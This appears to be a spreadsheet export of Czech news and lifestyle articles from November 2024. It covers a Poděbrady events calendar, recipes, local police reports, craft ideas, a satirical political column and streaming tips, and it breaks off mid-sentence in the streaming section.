    <t>Kulturní přehled – listopad 2024 Městská knihovna Poděbrady úterý 1. 10. – pátek 20. 12. VÝSTAVA: PODĚBRADY V AKVARELECH – Magdaléna Michelfeitová Vstupní hala, vstupné zdarma pondělí 14. 10. – pondělí 29. 11. VÝSTAVA: ART EXHIBITION – Věra Kubík Kdolská a Alena Revinco Kdolská Společenský sál, vstupné dobrovolné pondělí 4. 11. / 15.30 TVOŘIVÁ DÍLNA PRO DĚTI Dětské oddělení, vstupné zdarma úterý 5. 11., 12. 11., 19. 11., 26. 11. / 18.00–20.00 KURZ HÁČKOVÁNÍ – pro nové zájemce Klubovna – přízemí, 1 lekce 60 Kč nebo celý kurz 400 Kč čtvrtek 7. 11. / 10.00 BOOKSTART: AROMA LÉKÁRNIČKA PRO DĚTI Workshop s lektorkou Evou Riegerovou Dětské oddělení, vstupné zdarma úterý 12. 11., 26. 11. / 10.00 VIRTUÁLNÍ UNIVERZITA TŘETÍHO VĚKU – ŽIVOT V BAROKU Společenský sál středa 13. 11., 27. 11. / 10.00 VIRTUÁLNÍ UNIVERZITA TŘETÍHO VĚKU – SANTINI Společenský sál pátek 15. 11. / 14.30 HRÁTKY S PAMĚTÍ Společenský sál, vstupné zdarma pondělí 18. 11. / 15.30 TVOŘIVÁ DÍLNA PRO DĚTI Pobočka Žižkov , vstupné zdarma pondělí 18. 11. / 16.00–20.00 VÝROBA VÁNOČNÍCH OZDOB – kurz patchworku Klubovna-přízemí, cena kurzu 100 Kč středa 20. 11. / 13.30–17.30 MOUDRÁ SOVIČKA, Z. S.: JAK NA CHYTRÝ TELEFON A TABLET PRO NOVÉ ZÁJEMCE Společenský sál, vstup zdarma (pouze pro registrované) čtvrtek 21. 11. / 18.00 BESEDA SE SPISOVATELKOU PETROU SOUKUPOVOU Společenský sál, vstupné 80 Kč čtvrtek 28. 11. / 16.00 KONCERT: KYTAROVÉ LISTOVÁNÍ V POHÁDKÁCH Dětské oddělení, vstupné zdarma čtvrtek 28. 11. / 18.00–22.00 VÝROBA VÁNOČNÍCH OZDOB – kurz patchworku Klubovna – přízemí, cena kurzu 100 Kč Divadlo Na Kovárně sobota 2. 11. / 15.00–18.00 MŮŽEM, CO CHCEM – charitativní podnikatelská konference Inspirace lidmi, kteří dělají, co je těší a dává jejich životu smysl. Veškerý výtěžek poputuje na podporu projektu Sanitka přání. Pořádá Podnikatelky SOBĚ neděle 3. 11. / 15.00 MĚLA BABKA ČTYŘI JABKA – pohádka V každém jablíčku je skrytá jedna pohádka. Čtyři pohádky tvoří hravý celek, který malé diváky vtáhne do pohádkového děje. Vhodné pro děti od 3 let, délka 50 min. Hraje DS VOJAN Libice nad Cidlinou . Cena vstupenky 90 Kč čtvrtek 14. 11. / 19.00 3. ABONENTNÍ PŘEDSTAVENÍ: BLÁZINEC Napínavá groteska o světě, ve kterém se vlády zmocní blázni z jednoho psychiatrického ústavu. Hraje Green Production a Bohumír Starý Cena vstupenky 590 Kč úterý 19. 11. / 18.00 ZUŠ OTAKARA VONDROVICE: PODZIMNÍ KONCERT Vystoupení žáků, studentů a pedagogové ZUŠ v pestrém programu ze všech studijních oborů. Vstupné dobrovolné neděle 24. 11. / 15.00 SLUNCOMRAK – pohádka Připojte se k pohádkovému dobrodružství Sluncomraka, kde se humor, hudba a každodenní překvapení podílí na koloběhu života. Vhodné pro děti od 3 let, délka 50 min. Hraje Divadlo Máj Praha Cena vstupenky 90 Kč úterý 26. 11. / 19.00 KONCERT STRUN Kristýna Fialová na violu a Dominika Svozilová na harfu zahrají skladby Franze Schuberta . Pořádá Společnost Otakara Vondrovice Poděbrady Cena vstupenky 300 Kč Akce Lázní Poděbrady čtvrtek 7. 11. / 19.00 KŘESLO PRO HOSTA – MARIE TOMSOVÁ Kongresové centrum Lázeňská kolonáda , vstupné od 200 Kč čtvrtek 21. 11. / 19.00 KŘESLO PRO HOSTA – IGOR CHMELA Filmový herec, komik, ale i zpěvák, fotograf, textař, kytarista, moderátor a dabér, to vše je Igor Chmela . Kongresové centrum Lázeňská kolonáda , vstupné od 200 Kč Ostatní akce pátek 8. 11. / 16.30–18.30 SVĚTÝLKOVÁ CESTA Zábavná stezka s úkoly pro děti kolem DDM Symfonie. Vstupné 40 Kč/dítě sobota 9. 11. / 10.00–18.00 SVATOMARTINSKÉ TRHY Tradiční událost spojená s ochutnávkami prvních vín aktuálního ročníku. Součástí akce je jarmark řemeslných produktů a pochutin, vinařská zóna a doprovodný program. Víno se bude nalévat výhradně do festivalových sklenic. Jiřího náměstí a I. nádvoří zámku, vstup zdarma pondělí 11. 11. / 13.00 DEN VÁLEČNÝCH VETERÁNŮ Pietní akt na II. nádvoří zámku čtvrtek 14. 11. / 17.00 SRDCOVKY – JANA HRABĚTOVÁ Slavnostní uvedení prvního medailonku z dokumentárního cyklu o významných a zajímavých osobnostech Poděbradska. Společenský sál, Městská knihovna Poděbrady Klub českých turistů Poděbrady sobota 9. 11. Rtyně v Podkrkonoší – rozhledna Žaltman, 12 km středa 13. 11. Doksy – muzeum Čtyřlístek, zámek, zámecký park, cca 5 km sobota 16. 11. Pelhřimov , muzeum rekordů, 4 km sobota 23. 11. Rumburk , Loreta – Křížová cesta – muzeum, 6 km</t>
  </si>
  <si>
    <t>20241101_734_3442555312_1a3b4ae45d854c8eecbf.html</t>
  </si>
  <si>
    <t>1a3b4ae45d854c8eecbf</t>
  </si>
  <si>
    <t>Podzimní drinky tak, jak je neznáte Když se řekne puding, představí si většina z nás rychlou sladkou svačinu a také souboj o to, kdo dokáže z hrnce vyškrábat i poslední kapku této dobroty. Zkuste letos na podzim využít pudingy trochu jinak, a to pro přípravu jedinečných nápojů i svačinek pro malé i velké. Foto: Unsplash (Kamal Preet Kaur) Podzim a začátek zimy mohou být pro mnoho lidí skoro až skličujícím obdobím, které ostře kontrastuje s letní pohodou. Přitom jde o ideální čas ke společnému setkávání, ať už při venkovních procházkách zakončených teplým nápojem a sladkým dezertem, nebo rovnou příjemným posezením s rodinou a přáteli v teple domova. Chladné a sychravé počasí konce roku přeje také tomu, abyste kromě tradičních horkých nápojů vyzkoušeli i méně obvykle kombinace chutí, které potěší děti i dospělé s mlsnými jazýčky. Netradiční chuť smetanových pudingů Kromě známých receptů, které využívají celou řadu koření jako je kurkuma, chilli, zázvor a další, můžete svou rodinu a přátele potěšit také zcela netradičním přístupem k přípravě sladkých alkoholických i nealkoholických nápojů. Jen málo lidí by napadlo, že vynikající drink pro zahřátí může vzniknout z pudingové směsi. Přitom jsou tyto nápoje nejen nápadité, ale zároveň přináší spoustu variant příchutí, takže se vám nikdy neomrzí. Malí i velcí mlsouni si zamilují karamelové teplé mléko se šlehačkou. Pro jeho přípravu přitom potřebujete pouze karamelový puding, který záměrně uvaříte velmi řídký. Použít můžete klasické polotučné mléko, nebo se vrhnout do experimentu s mandlovým, případně jiným rostlinným mlékem. Pro slavnostní servírování budete potřebovat také vysoké sklenice, vyšlehanou smetanu coby horní vrstvu nápoje a případně také cukrové zdobení či nasekané bonbony. Dospělým můžete pro zahřátí připravit zábavnou variaci na svařené víno , ve které spojíte sladké bílé víno s jemnou chutí hrušek a vanilkového pudingu. V kombinaci se skořicí a vanilkovým cukrem se tento nápoj stane novým hitem vašeho menu pro jakékoliv podzimní či zimní setkání s přáteli. Nápoj nebo svačina? Pudingy mají mnoho podob Můžete také spojit příjemné s užitečným a svým dětem připravit lahodnou kombinaci netradičního sladkého nápoje a syté svačinky. Stačí opět připravit řidší karamelový puding, který ale ve vysokých sklenicích smícháme s křupavým arašídovým máslem a banánem nakrájeným na plátky. Pak už jen stačí ozdobit šlehačkou, karamelovými sušenkami či mletými arašídy a snídaně či svačina šampionů je na světě. Pro přípravu chutné svačiny do školy či oblíbeného skleničkového dezertu využijete vanilkový puding připravený podle tradičního návodu, který po vychladnutí vyšleháte s polotučným tvarohem a Vanilkovou pastou Dr. Oetker do hladkého krému. Ten pak stačí plnit do sklenic či mističek v kombinaci s piškoty, ovocem, sušenkami či dalšími oblíbenými dobrotami vaší rodiny. Lahodné kakao zahřeje tělo i duši Pokud se necítíte na velké experimentování, a přitom stále toužíte překvapit své blízké netradiční volbou chutí, nezoufejte! Vsaďte na netradiční zpracování notoricky známého nápoje pro dospělé i děti. Kdo by nechtěl ochutnat lahodné krémové horké kakao, které v sobě skrývá nádech kokosu, vanilky a koření? Na přípravu kokosového kakaa budeme potřebovat 400 ml kokosového mléka, ke kterému do hrnce přidáme 2 polévkové lžíce Přírodního kakaa Dr. Oetker a dobře promícháme. Poté přidáme 2 polévkové lžíce kokosového cukru a směs zahřejeme, ale nevaříme! Před podáváním ozdobíme špetkou mleté skořice a kardamomu a dochutíme 1 kávovou lžičkou vanilkového extraktu Bourbon Vanilka Madagaskar . Takto připravené kakao podáváme horké podle chuti, posypané kakaem a nastrouhanou hořkou čokoládou. Autor: Food &amp;amp; Travel team Rubrika transition_slide Food &amp;amp; Travel</t>
  </si>
  <si>
    <t>3</t>
  </si>
  <si>
    <t>2</t>
  </si>
  <si>
    <t>20241101_74_3264625074_979ba348601e1db02963.html</t>
  </si>
  <si>
    <t>979ba348601e1db02963</t>
  </si>
  <si>
    <t>Policie při kontrole nehodového úseku u Doks na Českolipsku zabavila 3 řidičské průkazy</t>
  </si>
  <si>
    <t>Policie při kontrole nehodového úseku u Doks na Českolipsku zabavila 3 řidičské průkazy Na dopravně rizikový úsek silnice I/38 u Doks na Českolipsku se ve čtvrtek zaměřili policisté. V minulosti se na ní stalo několik vážných nehod, poslední letos v červenci si vyžádala dvě oběti. Policisté při čtvrteční preventivní akci zadrželi tři řidičské průkazy. Dvěma řidičům kvůli tomu, že v úseku s povolenou 90kilometrovou rychlostí jeli skoro 150 kilometrů za hodinu, a třetímu rychle jedoucímu řidiči i kvůli opilosti. Na webu policie o tom dnes informovala její regionální mluvčí Ivana Baláková. Dopravní policisté se zaměřili na úsek mezi obcemi Obora a Bezděz , kde v červenci po čelním střetu dvou vozidel zemřeli oba řidiči a další čtyři lidé, z toho tři děti, utrpěli vážná zranění. Podle svědků jel tehdy po I/38 z Mladé Boleslavi na Českolipsko velmi riskantně řidič vozu Volkswagen Passat, když u Obory vyjel do protisměru a smetl ze silnice dodávku. "Včerejší (čtvrteční) výsledky měření rychlosti v tomto úseku jen potvrdily, že si tu řidiči s překračováním rychlostních limitů starosti příliš nedělají. Radary zaznamenaly během čtyř hodin překročení dovolené rychlosti u 21 z nich, přičemž se zjištěné hodnoty většinou pohybovaly na devadesátce od 120 kilometrů za hodinu výše," uvedla Baláková. Dva řidiči jeli dokonce rychlostí 147 a 149 kilometrů za hodinu. Právě jim policisté zabavili řidičský průkaz a jejich přestupek oznámili do správního řízení. "V něm skončí i řidič, kterému naměřili 128 kilometrů v hodině, a byl navíc pod vlivem alkoholu," dodala mluvčí policie. Mezi další zjištěné prohřešky při čtvrteční preventivní akci patřilo nebezpečné předjíždění v místech, kde to zakazuje dopravní značka, nebo přes plnou čáru před horizontem. "To kolegové ocenili pětitisícovou pokutou. Někteří řidiči se také 'zapomněli' připoutat bezpečnostním pásem," uvedla Baláková. Silnici podle ní využívají ve větší míře obyvatelé Českolipska, kteří dojíždějí do zaměstnaní na směny do Středočeského kraje . "Proto je velmi frekventovaná a vysoká rychlost ani další rizikové chování na ni rozhodně nepatří. Dopravní policisté budou tomuto úseku i nadále věnovat zvýšenou pozornost," dodala mluvčí policie. čtk Autor: Genus Editor3 Rubrika transition_slide 112</t>
  </si>
  <si>
    <t>575</t>
  </si>
  <si>
    <t>20241101_75_3264550299_eb283e1d2ffd1bb23b3f.html</t>
  </si>
  <si>
    <t>eb283e1d2ffd1bb23b3f</t>
  </si>
  <si>
    <t>Vyzdobte svůj domov kaštany: Stylové dekorace a jedinečné nápady</t>
  </si>
  <si>
    <t>Vyzdobte svůj domov kaštany: Stylové dekorace a jedinečné nápady close Profimedia / Profimedia Kristýna Stoklásková 1. 11. 2024 clock 3 minuty video Také když jdete kolem kaštanu, strčíte si jeden do kapsy pro štěstí? Kaštany nás přitahují svou hladkostí, leskem a hřejivou hnědou barvou, která jako by v sobě skrývala kousek podzimu. A co kdybyste si z nich vytvořili něco, co vám podzimní atmosféru přinese až domů? Kaštany jsou jedním z malých podzimních pokladů, které nám příroda nabízí jen pár týdnů v roce. Jejich sbírání je zábava pro děti i dospělé. Jakmile je máte, už přemýšlíte, co z nich vytvoříte doma. Mohou být skvělým základem pro podzimní dekorace nebo jen příjemnou připomínkou venkovní atmosféry, kterou přenesete přímo do obýváku. Navíc je s nimi jednoduché kouzlit. Podívejte se na video z YT tvorby kanálu DIY by Kreativní Techniky – Podzimní dekorace z kaštanů Zdroj: Youtube Věnec Kaštanový věnec je oblíbenou podzimní dekorací, kterou si snadno vytvoříte sami. Stačí drátěný nebo polystyrenový základ, lepidlo a samozřejmě pořádná hromádka kaštanů. Jednoduše je přilepujte těsně k sobě, ať zakryjí celý základ. Pro oživení můžete přidat pár šišek, barevných listů nebo i kousky mechu. Výsledkem bude věnec, který nejen ozdobí vchodové dveře, ale dodá vašemu domovu tu pravou podzimní atmosféru. close Kaštanový věnec je oblíbenou podzimní dekorací, kterou si snadno vytvoříte sami. Postavičky z kaštanů Kaštanové figurky jsou skvělou zábavou pro všechny, kdo si chtějí doma vyrobit drobné, roztomilé dekorace, které navíc zvládnou i děti. Stačí vám kaštany, párátka, špejle, lepidlo a trochu kreativity. Každý kaštan snadno propíchnete a spojíte s ostatními do tvaru zvířátek nebo postaviček. S trochou trpělivosti vytvoříte třeba ježka, medvěda nebo i legračního skřítka. Oči a nosy můžete udělat z korálků nebo malých kamínků, a pokud máte po ruce žaludy nebo malé větvičky, můžete je využít jako končetiny nebo uši. Výsledné figurky si pak můžete vystavit na okně nebo poličce, budou vám doma připomínat radost z tvoření a barevný podzim venku. close Kaštanové figurky jsou skvělou zábavou pro všechny, kdo si chtějí doma vyrobit drobné, roztomilé dekorace. Související články video Podzimní stůl Pokud chcete proměnit jídelní stůl v podzimní středobod pozornosti, kaštany jsou přesně to, co potřebujete. Nasypte je do velké mísy nebo je rozmístěte po stole spolu s malými šiškami, žaludy a barevnými listy, vytvoříte tak přírodní zátiší, které připomíná podzimní les. Doprostřed kompozice můžete přidat svíčky, které večer vykouzlí nádherné teplé světlo a celý stůl oživí. close Profimedia / Profimedia zoom_in Nasypte kaštany do velké mísy nebo je rozmístěte po stole spolu s malými šiškami, žaludy a barevnými listy, vytvoříte tak přírodní zátiší, které připomíná podzimní les. Malované kaštany Malování na kaštany je snadný způsob, jak vytvořit originální podzimní dekorace, které si můžete užít s dětmi. Stačí vám pár kaštanů a bílý akrylový fix, kterým můžete na každý kaštan nakreslit třeba srdíčko, hvězdičku nebo jiné jednoduché tvary. Začněte tím, že kaštany očistíte a jemně osušíte, aby fix dobře držel. Pak už jen kreslete podle fantazie nebo jednoduše sledujte motivy, které děti vymyslí. Hotové kaštany se skvěle hodí jako ozdoba do misky, můžete je přidat i mezi sušené bylinky nebo větvičky a vytvořit tak přírodní dekoraci plnou barev a osobního kouzla. close Profimedia / Profimedia zoom_in Malování na kaštany je skvělý způsob, jak vytvořit originální podzimní dekorace, které si můžete užít s dětmi. Sledujte nás v Google Zprávách Newsletter Odesláním souhlasím se Všeobecnými smluvními podmínkami a beru na vědomí Zásady zpracování osobních údajů spol. VLTAVA LABE MEDIA a.s. Doporučené články facebook instagram pinterest youtube Newsletter Odesláním souhlasím se Všeobecnými smluvními podmínkami a beru na vědomí Zásady zpracování osobních údajů spol. VLTAVA LABE MEDIA a.s. vlm Copyright © VLTAVA LABE MEDIA a.s. všechna práva vyhrazena Publikování, šíření nebo jakékoliv jiné užití obsahu pro jiné než osobní účely uživatele, je bez písemného souhlasu VLTAVA LABE MEDIA a.s. zakázáno. Toto ustanovení platí také pro RSS kanály a jejich obsah. Přihlášení Rádi bychom znali důvod proč se nechcete přihlásit. Odběr newsletteru Chcete pravidelně dostávat výběr nejlepších článků na Váš e-mail? Odesláním souhlasím se Všeobecnými smluvními podmínkami a beru na vědomí Zásady zpracování osobních údajů spol. VLTAVA LABE MEDIA a.s. Skutečně se chcete odhlásit?</t>
  </si>
  <si>
    <t>20241101_76_3264665201_c402c06910dace97131b.html</t>
  </si>
  <si>
    <t>c402c06910dace97131b</t>
  </si>
  <si>
    <t>Muž v Brně měl tolik promile, že policistům nestačil ani tester</t>
  </si>
  <si>
    <t>Muž v Brně měl tolik promile, že policistům nestačil ani tester Simona Knotková Zdroj: Depositphotos Čtyřiapadesátiletý muž v brněnských Řečkovicích nadýchal 5,38 promile, což už je dávka alkoholu , která může být smrtelná. Strážníkům při prvotním měření nestačilo ani rozpětí testeru na alkohol . V tiskové zprávě o tom informoval mluvčí strážníků Jakub Ghanem. Hlídka strážníků přijela muže zkontrolovat do tramvajové smyčky v Řečkovicích ve čtvrtek v poledne po telefonátu řidičky dopravního podniku. S pomocí cestujícího prý muže odtáhla z blízkosti kolejí, u kterých ležel silně opilý. Měla obavy, aby se nevrátil zpátky k trati a neohrozil tak svůj život. „Moment překvapení pro hlídku nastal, když stále ještě polehávajícího muže pobídla k podstoupení dechové zkoušky. Přístroj totiž po prvním pokusu ukázal, že příliš vysokou hodnotu ani nedokáže změřit. Technické maximum tohoto konkrétního zařízení se přitom pohybuje kolem šesti promile,“ uvedl mluvčí. Strážníci proto muži zavolali záchrannou službu a s drobným časovým odstupem nechali dotyčného znovu dýchnout do alkohol testeru. Zobrazil extrémní hodnotu 5,38 promile, která pro nenavyklého člověka může být i smrtelná. Za hranici, při které hrozí upadnutí do bezvědomí a smrt, je považována hodnota čtyř promile. Někteří lidé jsou schopni snášet alkohol výrazně lépe. Příkladem je traktorista Milan Čurda , kterého před lety zadrželi policisté za volantem fekálního vozu, když nadýchal osm promile alkoholu . V roce 2018 lékaři ošetřovali houbaře z Ostravska se zlomeným kotníkem, který měl v krvi dokonce 8,83 promile alkoholu . Za světového rekordmana je považován Polák, který po oslavě s kamarády nadýchal 12,3 promile. Zdravotníci si muže v Brně převzali do své péče a po ošetření ho odvezli do nemocnice. Je podezřelý z porušení takzvaného tabákového zákona, protože se v tomto stavu zdržoval na nástupišti hromadné dopravy. Ve správním řízení mu hrozí pokuta do 20.000 korun.</t>
  </si>
  <si>
    <t>20241101_77_3264721118_80bd9830d726d8d664ac.html</t>
  </si>
  <si>
    <t>80bd9830d726d8d664ac</t>
  </si>
  <si>
    <t>Strašidelné špagety s bazalkovou omáčkou a duchy: Perfektní recept na halloweenskou party</t>
  </si>
  <si>
    <t>Strašidelné špagety s bazalkovou omáčkou a duchy: Perfektní recept na halloweenskou party Hledáte originální recept na halloweenskou párty, který zaujme děti i dospělé? Připravte si strašidelné špagety s bazalkovou omáčkou a roztomilými duchy z mozzarelly. Tento jednoduchý, ale efektní pokrm kombinuje klasické italské chutě s hravou halloweenskou tématikou. Zelená bazalková omáčka představuje mystické bažiny, ze kterých vystupují bílí duchové z mozzarelly s černýma olivovýma očima. Recept je nejen chutný, ale také zábavný na přípravu a perfektně se hodí pro jakoukoliv halloweenskou oslavu. Co v článku najdete Strašidelné špagety s mozzarellovými duchy – recept Počet porcí: 4–6 Doba přípravy: 45 minut Ingredience 500 g špaget 2 ks šalotky 1 ks střední mrkve 2 ks řapíků celeru 4 lžíce olivového oleje 2 lžíce rajského protlaku 2 stroužky česneku 2 hrsti čerstvého špenátu 2 lžíce bazalkového pesta 200 g mini mozzarelly 6 křepelčích vajíček 1 hrst čerstvé bazalky 1 hrst černých oliv Sůl a pepř dle chuti Anna Shepulova / Shutterstock.com Postup přípravy Šalotku nakrájejte na jemné kostičky. Mrkev oloupejte a spolu s celerem nakrájejte na drobné kostičky. Ve větším hrnci rozehřejte olivový olej a zeleninu opékejte 5–7 minut na středním plameni. Přidejte rajský protlak a prolisovaný česnek , krátce restujte. Vmíchejte špenát a podlijte vodou . Osolte, opepřete a vařte 20 minut do zhoustnutí. Před koncem přidejte bazalkové pesto. Během vaření omáčky připravte těstoviny v osolené vodě podle návodu. Připravte dekoraci: Na kuličku mini mozzarelly položte kolečko černé olivy. Vařené křepelčí vajíčko můžete seříznout, aby šel vidět žloutek, a položte na něj kolečko černé olivy . Uvařené těstoviny promíchejte s omáčkou, ozdobte „duchy“ a zakápněte olivovým olejem a bazalkovým pestem. Tipy pro dokonalý výsledek Pro intenzivnější chuť můžete do omáčky přidat bílé víno . Těstoviny vždy vařte v dostatečném množství osolené vody. „Duchy“ můžete připravit dopředu a uchovávat v lednici. Zbylou omáčku lze zmrazit a použít později. Zdroj: Kupi Diskuze Diskutovat recept děti párty špagety halloween mozzarella netradiční recepty olivy</t>
  </si>
  <si>
    <t>20241101_78_3264763019_f3dbee336c77d902c04b.html</t>
  </si>
  <si>
    <t>f3dbee336c77d902c04b</t>
  </si>
  <si>
    <t>Panoptikum Vladimíra Mertlíka: Svátek politické slušnosti, kašpar roku Klaus a Schillerová v muzice</t>
  </si>
  <si>
    <t>Panoptikum Vladimíra Mertlíka : Svátek politické slušnosti, kašpar roku Klaus a Schillerová v muzice Alena Schillerová • Zdroj: Blesk:Michal Protivansky/CNC Týden od oslav státního svátku přinesl médiím dožínky v míře srovnatelné s bojem o zrno družstevních zemědělců JZD Brázdy míru v Zevlounovicích. Dlužno přiznat, že změna hostitele již podruhé přinesla vyšší společenskou úroveň looku reprezentantů státu a je spravedlivé říci, že se ctí obstála i opozice. Nátěry se zaměřily výhradně na výraz tváří některých hostů, jež vytvářely dojem, že welcome drink v Rothmayerově sále byl ocet kvasný, lihový 8% z vinic Řempo Vega, který nelze používat na čištění hliníkových trubek. Sleduje-li divák výrazy Tomia Okamury , Filipa Turka , Aleny Schillerové a dalších Spasitelů Našichlidí při prezidentově projevu, musí mu na mysl přijít otázka: „Proč lezeš do hospody, kde podle tebe blbě hrajou?“ Nikdo netrvá na jejich rozzářených tvářích. Jde jen o elementární neutrální slušnost, zvláště v případě dámy, ale o ní až později. Přesto lze nalézt ve výrazech a chování odpůrců současného režimu jemné nuance svědčící o různém nastavení jejich libida, resp. libida dominandi. Proto fotografie chvílemi zavřených očí Andreje Babiše při ceremoniálu a projevu prezidenta neurážejí a nemusí znamenat nic víc než potřebu odpočinout očím. Zvláště existují-li i jeho fotografie z doby před zahájením večera, kde se s hurónským smíchem baví s jiným expremiérem Mirkem Topolánkem . Ani jeho zrychlený přesun domů Novou galerií a Rothmayerovým sálem bez přítomnosti na recepci nic nedokazuje. Splnil svou státnickou povinnost a tím jeho úkol skončil. Také Karel Havlíček , který tentokrát místo obvyklého psa vyvedl manželku, udělal dobře. Na chvíli se zlidštil, naplnil význam večera a jeho výraz během ceremoniálu přičtěme povinnému outfitu opozice pro tento večer: tmavý oblek/uniforma/večerní šaty/ přísný ksicht . Pokud se Miloš Zeman rozhodl, že největší svátek země, jíž po deset let vládl, je jeho majestátu nedůstojný a dá přednost konzumaci kořalky s tlačenkou v podvlíkačkách od pyžámka, do nichž si mastné prsty utírá, je to jeho věc. Přítomní jeho postoj uznali s respektem a čas strávený bez něj si užívali s potěšením. I letošní titul Kašpar roku vyhrál Václav Klaus nejen svým výrazem. V poledne mezi stolky zahrádky kavárny Obecního domu , obědvajícími turisty a tleskajícím shlukem příznivců pronesl státnický projev, po němž se zhroutila burza válečných štváčů na Wall street a Vladimir Putin podle zpráv TV Russia Today po Klausových slovech propukl v neutěšitelný pláč. Není divu! Václav Klaus je stále stejným hrdinou jako při Pražském povstání v květnu 1945, kdy se ve svých čtyřech letech účastnil stavby barikád, jak na sebe skromně prozradil v roce 2010. I dnes, „přestože se kolem nás očividně utahuje pomyslná smyčka nesvobody, cenzury a progresivního myšlení, které z nás pomalu chce vymazat to, čím vlastně jsme“ (cit.), pronesl Václav Klaus tváří v tvář štvavým mikrofonům a kamerám progresivistické, aktivistické, homosexualistické České televize tato slova: „Je to překvapivé, že nás nechávají mluvit!“ Po příchodu na praktikábl sice poněkud zmateně vysvětloval podle něj hojnou účast tím, že nejde o akci, „na niž se vydávají pozvánky, kdo smí přijít a kdo nesmí“ (cit.), aby vzápětí dodal: „Je to tím, že jsou zde všichni příchozí dobrovolně.“ (cit.). Dále odhalil, že je „naše suverenita pomalu a plíživě okrajována, oslabována a likvidována ve prospěch suverenity bruselské centrály Evropské unie ... dnes už si nemalá část našich spoluobčanů uvědomuje hospodářský a společenský úpadek, do něhož nás Evropská unie a současný společenský vývoj v Evropě přivádějí... Není však v tom s námi naše vláda a naši politikové. Ti by dnešní den oslavovat neměli…!“ (cit.) Snad proto, co řekl, snad proto, že večer na Pražský hrad nedostal pozvánku, že tam smí, ale zároveň tam nebyl dobrovolně (?)… Snad proto se tvářil jak Bůh pomsty, ale Václavu Klausovi nestačí netleskat, mít ruce podél těla či v kapse a být podezříván, že tleská v kapsách či bůhví co… Je třeba sepnout konečky prstů vysoko u obličeje, aby bylo jasno, že se netleská! Proto patří Václavu Klausovi i titul Pozér roku. Koneckonců vzpomeňme Klausova protestu proti nošení roušek v covidu. Prohlášení, že Velikáni žijí „roušky nenose“ nestačilo. Bylo potřeba si roušku vzít, aby se mohla nasadit pod bradu na krk. Jen tak bylo vidět, že ji nese ten, jenž ji nosit nebude! Největší vlny způsobila svým výrazem opovržení a znechucení nad okolím během slavnostního večera na Pražském hradě Alena Schillerová . Jiří Lobkowicz k tomu na svém postu sítě X příhodně napsal: „Nikdy z ní nebude paní z milosti, opravdu není šťastná, že je ženou, a její úsměv a pohled popisuje její ošklivou hořkost a její neustálý vztek. Nelze ji charakterizovat elegancí nebo krásou formy, způsobu pohybu neb řeči. Předstírá, že je důležitá, nenávidí spravedlnost a má ráda dramata a drby, ráda mluví ošklivě o druhých, nikdy není ve svých činech skutečně autentická a jejím politickým krédem je udělat dojem nebo povzbudit své ego. Není ani inteligentní, ani zajímavá, nemá pokoru a zdvořilost, a když to shrnu, neslučuje v sobě žádnou emoční inteligenci, žádné sociální povědomí a nemá žádný skutečný přístup k životu a ostatním.“ Mimo souhlasných komentářů na straně jedné a vulgárních urážek na straně druhé se rozpoutala diskuze i ze strany Nešvábů a Nenašichlidí , jak dokládají ukázky: @ Martin Hájek : „Při vší úctě a ohleduplnosti k Vám, pane Lobkowicz . Proč soudíte a odhadujete lidi podle fotky? To je nová móda? Dnes jste již druhý.“ @Blond sarcastic: „Nikdy v životě bych ANO ani AS nevolila. Ale z podobných postů a osob, které je lajkují, navíc pravděpodobně s pocitem nějaké falešné morální nadřazenosti, je mi stydno. Neustálé hodnocení vzhledu AS je tak strašlivě stupidní a laciné.“ Dalo by se argumentovat, že Jiří Lobkowicz v příspěvku nesoudí Alenu Schillerovou podle fotky ani nehodnotí její zjev, který navíc na Hradě patřil k jejím nejzdařilejším. Stačí jen pozorně číst, aby čtenář pochopil Lobkowiczův akcent na její vnitřní podobu odrážející charakter. A s tímto postřehem lze bez zaváhání souhlasit. Ano, hodnotit lidi podle vzhledu je laciné, ale je třeba zdůraznit, že Alena Schillerová sarkastickým útokům na svůj vzhled jde svými pávy, papoušky a pohledem nymfy setsakra vstříc. Panoptikum se nakonec rozhodlo ponechat vše na nejobjektivnějším soudu, umělé inteligenci (AI) a účast na vzniklých dílech připustit jen v zadání, jehož pravdivost nelze zpochybnit, když požádalo AI o hudební dílo pod titulem: „Politička Alena , milující pávy a photoshop .“ Pusťte si vzniklá díla, první v rytmu reggae , druhé v rytmu funky (námět: Vladimír Mertlík , hudba i text: AI, aranže, hraje a zpívá: AI). Autor: Vladimír Mertlík Autor Vladimír Mertlík</t>
  </si>
  <si>
    <t>26460</t>
  </si>
  <si>
    <t>25680</t>
  </si>
  <si>
    <t>20241101_79_3264599970_59370040f360a9547f3b.html</t>
  </si>
  <si>
    <t>59370040f360a9547f3b</t>
  </si>
  <si>
    <t>VOD tipy: Druhé Diplomatické vztahy, nadržení puberťáci i filmová legenda</t>
  </si>
  <si>
    <t>VOD tipy: Druhé Diplomatické vztahy, nadržení puberťáci i filmová legenda Diplomatické vztahy | Netflix 78 % Chválený a oceňovaný politický seriál o americké velvyslankyni sloužící ve Velké Británii se bude ve své druhé sezóně snažit ukázat, že úspěch jedničky rozhodně nebyl náhodný. Hlavní hrdinka Kate ( Keri Russell ) zjistí, že šokující události z konce první řady nemá na svědomí žádný zahraniční nepřítel, ale důkazy začínají ukazovat na britskou vládu. Jedinou oporu najde ve skoro bývalém manželovi Halu Wylerovi, hodně vrásek jí pak způsobí také příjezd americké viceprezidentky. Diplomatické vztahy: trailer na 2. sérii | Netflix Special Ops: Lioness 74 % Na SkyShowtime startuje druhá řada hvězdně obsazeného thrilleru od renomovaného tvůrce Taylora Sheridana , v němž naleznete před kamerou jména jako Zoe Saldana , Nicole Kidman či Morgan Freeman . Významná politička je unesena na americké půdě. Joe je odhodlaná svůj tým proměnit ve velmi speciální skupinu a pro svůj cíl je ochotna udělat cokoliv. Upoutávka slibuje více těžkotonážní akce i politických pletich. Special Ops: Lioness: trailer na 2. sérii | Paramount + Hudba Johna Williamse 85 % John Williams patří bez debat mezi největší hudební velikány, jaké filmový svět kdy poznal. Autor nesmrtelných hudebních motivů ke Star Wars , Indianu Jonesovi , Sám doma či Harry Potterovi se nyní na Disney+ dočkal obsáhlého dokumentu, který se zaměřuje na život i obdivuhodnou kariéru výjimečného skladatele. Ve filmu vystupují umělci a filmaři, jejichž životy byly ovlivněny jeho nadčasovou hudbou v čele se Stevenem Spielbergem . Hudba Johna Williamse : trailer | Disney+ Sex O'Clock 77 % Oblíbený komediální seriál pojednávající o sexuálních strastech mladých i dospělých dnes na platformě Voyo začíná svou druhou řadu. Adamova cesta za ztrátou panictví je stále složitá. Má sice holku, poznává ale, že je velmi náročné si ji udržet. Také jeho rodina zažívá své vlastní strasti. Jeho sestra sice bude mít miminko, k dospělosti má ale 